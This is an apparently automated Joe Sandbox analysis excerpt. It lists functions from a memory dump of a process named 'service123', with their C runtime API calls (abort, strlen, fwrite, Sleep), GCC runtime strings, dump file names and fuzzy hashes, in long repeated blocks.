abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D56
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D5B
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D60
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D65
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6A
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6F
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D74
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D79
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D7E

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 69f2f5bcc04e92503fe01ced6f102d5792e48c4d85d4df18c058018d50acc486
Instruction ID: 8aea953e9c0ef2d83d8a2b6c21b1b969e846b294deebfd238def213ed89d07cf
Opcode Fuzzy Hash: 69f2f5bcc04e92503fe01ced6f102d5792e48c4d85d4df18c058018d50acc486
Instruction Fuzzy Hash: 3DC012209CA3298B08203D5A129C068B2B42717325B162D24880963E008A02E8088094

Function 6C76C150 Relevance: 36.3, APIs: 24, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49de81505dba0753cd6dd291c398224cb2cdfa040a95abc80d3d8f0f67356f5c
Instruction ID: 09ded69ac48bebe390579ec5dc91fff5ba7f974e99c528e152d1718b0897ccc5
Opcode Fuzzy Hash: 49de81505dba0753cd6dd291c398224cb2cdfa040a95abc80d3d8f0f67356f5c
Instruction Fuzzy Hash: 22B1C0716083468FDB10DF5AC58075ABBF1BF96309F18496DED959BB02C335E904CB92

Function 6C76C470 Relevance: 33.2, APIs: 22, Instructions: 152COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D12
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D17
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D21
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D26
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D30
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D35
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D44
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D4C
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D51
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D56
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D5B
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D60
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D65
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6A
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6F
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D74
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D79
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D7E

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 767fdf0e825f6342698145ffaf053bfbed1831969a294ac06867542e5daa0ae4
Instruction ID: 0e2ea810d073b531c998604737ed96ea8607a6fc78be5bc3697e5d6ab4b5e757
Opcode Fuzzy Hash: 767fdf0e825f6342698145ffaf053bfbed1831969a294ac06867542e5daa0ae4
Instruction Fuzzy Hash: B2419FB1A012148BCF00DF69C9917A9BBF5BB49349F28847ADC59DFB82E3359441CB61

Function 6C76D370 Relevance: 31.6, APIs: 21, Instructions: 130sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 6C76CD00: strlen.MSVCRT ref: 6C76CD7D

Sleep.KERNEL32 ref: 6C76D4D7
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D21
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D26
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D30
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D35
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D44
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D4C
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D51
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D56
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D5B
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D60
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D65
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6A
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6F
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D74
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D79
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D7E

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: abort$Sleepstrlen
String ID:
API String ID: 68130653-0
Opcode ID: 4b6fcba03f0a38c8ec3a06e62aa004e946dd39e90c1f8ee73dae5b2dbc83a146
Instruction ID: 7e2506b8ca23a507b6f002b4e1cbbce7e53e19ba97b36cca7aa978b1e07c4d41
Opcode Fuzzy Hash: 4b6fcba03f0a38c8ec3a06e62aa004e946dd39e90c1f8ee73dae5b2dbc83a146
Instruction Fuzzy Hash: 3051CEA071A3C1CAEF21CB3DC1497457FB0675330CF185579EA984BA82D3BA5909C7AA

Function 6C76D570 Relevance: 28.6, APIs: 19, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 7843719f20be28176fd6385aeedc6b878d396202637f52a5b87ab1aff322e5d5
Instruction ID: e6b3ad1ebe107c3259e985e33cb30c24d42eb43358fe714f63083c02e496fea5
Opcode Fuzzy Hash: 7843719f20be28176fd6385aeedc6b878d396202637f52a5b87ab1aff322e5d5
Instruction Fuzzy Hash: 4731C4706193058FE3209E5ED68476ABBE0BB95348F24993EE98887F01D335D444CB95

Function 6C76D67C Relevance: 28.5, APIs: 19, Instructions: 32COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D21
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D26
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D30
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D35
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D44
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D4C
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D51
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D56
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D5B
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D60
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D65
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6A
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6F
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D74
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D79
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D7E

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 6a978986521d2faa4f21e49faa05e83597843df431b75155095465bb83b63a9b
Instruction ID: 31777ec2f1b40331e1220f4debd1ee4c42f156bd4a73a74214e02d927cc8e29a
Opcode Fuzzy Hash: 6a978986521d2faa4f21e49faa05e83597843df431b75155095465bb83b63a9b
Instruction Fuzzy Hash: 03B092108CB128C34C202AA9464C0A5A6347B13344712BC10450A73D010A00E404C0A4

Function 6C76D6C0 Relevance: 27.1, APIs: 18, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: c0eaf7516b520c11cc9b6bf93acad55739505c52ed7c742e3c9f4f27c4fcbb70
Instruction ID: 24f65663d8413a8b01d969f6cd31ba9bfa55a847db4a692e873289ec1fd003b1
Opcode Fuzzy Hash: c0eaf7516b520c11cc9b6bf93acad55739505c52ed7c742e3c9f4f27c4fcbb70
Instruction Fuzzy Hash: 59415A70A193428FD710DF1AC68475AFBE0EB99708F248D2EE998C7B11D375D8448B96

Function 6C76D855 Relevance: 25.5, APIs: 17, Instructions: 45COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D30
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D35
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D44
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D4C
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D51
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D56
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D5B
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D60
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D65
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6A
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6F
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D74
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D79
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D7E

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: ccbcb3e433ba00217db214f3d0e49955eb2a91495d6490275622d86f884b6329
Instruction ID: 0b93808a044633833dfccc20bd197f71b2ec8065a0f76258946f109faccc7eeb
Opcode Fuzzy Hash: ccbcb3e433ba00217db214f3d0e49955eb2a91495d6490275622d86f884b6329
Instruction Fuzzy Hash: 38E0E53090A2574BDB20EE69C2883257BB17B8230CF242C68C9552BE42C325A80AC785

Function 6C77C0E0 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 130fileCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C77C151
fwrite.MSVCRT ref: 6C77C1F8
fputs.MSVCRT ref: 6C77C215
fwrite.MSVCRT ref: 6C77C23E
fputs.MSVCRT ref: 6C77C25D
fwrite.MSVCRT ref: 6C77C28C
fwrite.MSVCRT ref: 6C77C2BE
abort.MSVCRT ref: 6C77C2C3
abort.MSVCRT ref: 6C836157
free.MSVCRT ref: 6C83615F

Part of subcall function 6C76A340: strlen.MSVCRT ref: 6C76A3C5
Part of subcall function 6C76A340: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,6C77C1CC), ref: 6C76A3E0
Part of subcall function 6C76A340: free.MSVCRT ref: 6C76A3EA

Strings

terminate called after throwing an instance of ', xrefs: 6C77C1F1
-, xrefs: 6C77C271
terminate called without an active exception, xrefs: 6C77C285
not enough space for format expansion (Please submit full bug report at https://gcc.gnu.org/bugs/): , xrefs: 6C77C0F9

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: fwrite$abortfputsfreememcpy$strlen
String ID: -$not enough space for format expansion (Please submit full bug report at https://gcc.gnu.org/bugs/): $terminate called after throwing an instance of '$terminate called without an active exception
API String ID: 4144276882-4175505668
Opcode ID: d9fd965200dbe17983a24104fed885513337eff80a211d34465a00093aa2ead2
Instruction ID: 910dd8d06e7318c2e1f499641fa87762902cc6156acc871581734977b8243f98
Opcode Fuzzy Hash: d9fd965200dbe17983a24104fed885513337eff80a211d34465a00093aa2ead2
Instruction Fuzzy Hash: E0511AB05093189FDB20AFA8C64879ABBF4BF85308F01D92DE49987741D7789449CFA2

Function 6C76D8A8 Relevance: 24.1, APIs: 16, Instructions: 52COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D30
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D35
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D44
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D4C
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D51
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D56
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D5B
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D60
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D65
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6A
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6F
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D74
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D79
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D7E

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 13e52357e471c62398a4db4a04f5205d1cd0b875d15d0196540a2f27a5bee30a
Instruction ID: 27a2e74958f4a0e2ce9554850b57601c677a63e99cb50d96bc12216d21c4a306
Opcode Fuzzy Hash: 13e52357e471c62398a4db4a04f5205d1cd0b875d15d0196540a2f27a5bee30a
Instruction Fuzzy Hash: 75F0E9B09663464FD7209F19D5853657BB07B43315F681C54D8841BB42C3259498CBE1

Function 6C76DE50 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

@, xrefs: 6C76DEB8

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: strlen
String ID: @
API String ID: 39653677-2766056989
Opcode ID: 58641ef228c9238df90ee1b20dd4c39f007d3461987336ad49f1e79e61da8d04
Instruction ID: dd327fe8f4c13bfa53f61d1be4b6c14554c15bb9523b1c45c82d2e9a01e7391c
Opcode Fuzzy Hash: 58641ef228c9238df90ee1b20dd4c39f007d3461987336ad49f1e79e61da8d04
Instruction Fuzzy Hash: 1D21CC70A0125DCBDF20DF56CE84BD977B8AB56309F2445B6CD18ABA00D7309E88CF94

Function 6C76DA90 Relevance: 22.6, APIs: 15, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 5dea98f4feced117ea1e2fbde5a5b2991997ee0c11bc52d9895c37bdf72dd2d2
Instruction ID: cdb4bb42fbd5378b5a3d9f698cba2f6cf964006ef1127ed711e5a6aed7a2b678
Opcode Fuzzy Hash: 5dea98f4feced117ea1e2fbde5a5b2991997ee0c11bc52d9895c37bdf72dd2d2
Instruction Fuzzy Hash: FF414E74A052199BCF10DF66CA847DDB7B1BF89318F2489A9DC09A7B05D730AE84CF90

Function 6C76DCE0 Relevance: 21.1, APIs: 14, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
